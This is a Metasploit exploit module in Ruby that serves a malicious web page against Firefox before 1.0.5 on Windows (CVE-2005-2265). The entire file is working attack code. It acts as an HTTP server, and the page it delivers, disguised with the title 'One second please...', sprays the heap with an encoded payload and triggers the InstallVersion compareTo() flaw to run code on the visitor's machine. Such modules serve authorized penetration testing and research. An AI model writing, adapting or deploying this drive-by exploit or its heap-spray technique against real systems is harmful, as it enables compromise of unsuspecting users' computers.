173 lines
4.7 KiB
Ruby
173 lines
4.7 KiB
Ruby
##
|
|
# $Id$
|
|
##
|
|
|
|
##
|
|
# This file is part of the Metasploit Framework and may be subject to
|
|
# redistribution and commercial restrictions. Please see the Metasploit
|
|
# Framework web site for more information on licensing and terms of use.
|
|
# http://metasploit.com/projects/Framework/
|
|
##
|
|
|
|
|
|
require 'msf/core'
|
|
|
|
|
|
class Metasploit3 < Msf::Exploit::Remote
|
|
|
|
#
|
|
# This module acts as an HTTP server
|
|
#
|
|
include Msf::Exploit::Remote::HttpServer::HTML
|
|
|
|
def initialize(info = {})
|
|
super(update_info(info,
|
|
'Name' => 'Mozilla Suite/Firefox InstallVersion->compareTo() Code Execution',
|
|
'Description' => %q{
|
|
This module exploits a code execution vulnerability in the Mozilla
|
|
Suite, Mozilla Firefox, and Mozilla Thunderbird applications. This exploit
|
|
module is a direct port of Aviv Raff's HTML PoC.
|
|
|
|
},
|
|
'License' => MSF_LICENSE,
|
|
'Author' => ['hdm', 'Aviv Raff <avivra [at] gmail.com>'],
|
|
'Version' => '$Revision$',
|
|
'References' =>
|
|
[
|
|
['BID', '14242'],
|
|
['OSVDB', '17968'],
|
|
['CVE', '2005-2265'],
|
|
['URL', 'http://www.mozilla.org/security/announce/mfsa2005-50.html'],
|
|
],
|
|
'Payload' =>
|
|
{
|
|
'Space' => 400,
|
|
'BadChars' => "\x00",
|
|
},
|
|
'Targets' =>
|
|
[
|
|
[ 'Firefox < 1.0.5 Windows',
|
|
{
|
|
'Platform' => 'win',
|
|
'Arch' => ARCH_X86,
|
|
'StackAdjustment' => -3500,
|
|
'Addrs' => [ 0x12000000, 0x11C0002C, 0x1200002C, 0x1180002C ],
|
|
|
|
}
|
|
],
|
|
],
|
|
'DisclosureDate' => 'Jul 13 2005'
|
|
))
|
|
end
|
|
|
|
def on_request_uri(cli, request)
|
|
|
|
# Re-generate the payload
|
|
return if ((p = regenerate_payload(cli)) == nil)
|
|
|
|
print_status("Sending #{self.name} to #{cli.peerhost}:#{cli.peerport}...")
|
|
send_response_html(cli, generate_html(p), { 'Content-Type' => 'text/html' })
|
|
|
|
# Handle the payload
|
|
handler(cli)
|
|
end
|
|
|
|
def generate_html(payload)
|
|
|
|
enc_code = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch))
|
|
enc_nops = Rex::Text.to_unescape(make_nops(4), Rex::Arch.endian(target.arch))
|
|
|
|
spray_to = sprintf("0x%.8x", target['Addrs'][0])
|
|
spray_slide1 = Rex::Text.to_unescape( [target['Addrs'][1]].pack('V'), Rex::Arch.endian(target.arch) )
|
|
spray_slide2 = Rex::Text.to_unescape( [target['Addrs'][2]].pack('V'), Rex::Arch.endian(target.arch) )
|
|
eax_address = sprintf("0x%.8x", target['Addrs'][3])
|
|
|
|
return %Q|
|
|
<html>
|
|
<head>
|
|
<!--
|
|
Copyright (C) 2005-2006 Aviv Raff (with minor modifications by HDM for the MSF module)
|
|
From: http://aviv.raffon.net/2005/12/11/MozillaUnderestimateVulnerabilityYetAgainPlusOldVulnerabilityNewExploit.aspx
|
|
Greets: SkyLined, The Insider and shutdown
|
|
-->
|
|
<title>One second please...</title>
|
|
<script language="javascript">
|
|
|
|
function BodyOnLoad()
|
|
{
|
|
location.href="javascript:void (new InstallVersion());";
|
|
CrashAndBurn();
|
|
};
|
|
|
|
// The "Heap Spraying" is based on SkyLined InternetExploiter2 methodology
|
|
function CrashAndBurn()
|
|
{
|
|
// Spray up to this address
|
|
var heapSprayToAddress=#{spray_to};
|
|
|
|
// Payload - Just return..
|
|
var payLoadCode=unescape("#{enc_code}");
|
|
|
|
// Size of the heap blocks
|
|
var heapBlockSize=0x400000;
|
|
|
|
// Size of the payload in bytes
|
|
var payLoadSize=payLoadCode.length * 2;
|
|
|
|
// Caluclate spray slides size
|
|
var spraySlideSize=heapBlockSize-(payLoadSize+0x38); // exclude header
|
|
|
|
// Set first spray slide ("pdata") with "pvtbl" fake address - 0x11C0002C
|
|
var spraySlide1 = unescape("#{spray_slide1}");
|
|
|
|
spraySlide1 = getSpraySlide(spraySlide1,spraySlideSize);
|
|
|
|
var spraySlide2 = unescape("#{spray_slide2}"); //0x1200002C
|
|
|
|
spraySlide2 = getSpraySlide(spraySlide2,spraySlideSize);
|
|
|
|
var spraySlide3 = unescape("#{enc_nops}");
|
|
spraySlide3 = getSpraySlide(spraySlide3,spraySlideSize);
|
|
|
|
// Spray the heap
|
|
heapBlocks=(heapSprayToAddress-0x400000)/heapBlockSize;
|
|
//alert(spraySlide2.length); return;
|
|
memory = new Array();
|
|
for (i=0;i<heapBlocks;i++)
|
|
{
|
|
memory[i]=(i\%3==0) ? spraySlide1 + payLoadCode:
|
|
(i\%3==1) ? spraySlide2 + payLoadCode: spraySlide3 + payLoadCode;
|
|
}
|
|
|
|
// Set address to fake "pdata".
|
|
var eaxAddress = #{eax_address};
|
|
|
|
// This was taken from shutdown's PoC in bugzilla
|
|
// struct vtbl { void (*code)(void); };
|
|
// struct data { struct vtbl *pvtbl; };
|
|
//
|
|
// struct data *pdata = (struct data *)(xxAddress & ~0x01);
|
|
// pdata->pvtbl->code(pdata);
|
|
//
|
|
(new InstallVersion).compareTo(new Number(eaxAddress >> 1));
|
|
}
|
|
|
|
function getSpraySlide(spraySlide, spraySlideSize) {
|
|
while (spraySlide.length*2<spraySlideSize)
|
|
{
|
|
spraySlide+=spraySlide;
|
|
}
|
|
spraySlide=spraySlide.substring(0,spraySlideSize/2);
|
|
return spraySlide;
|
|
}
|
|
|
|
// -->
|
|
</script>
|
|
</head>
|
|
<body onload="BodyOnLoad()">
|
|
</body>
|
|
</html>
|
|
|
|
|
end
|
|
|
|
end |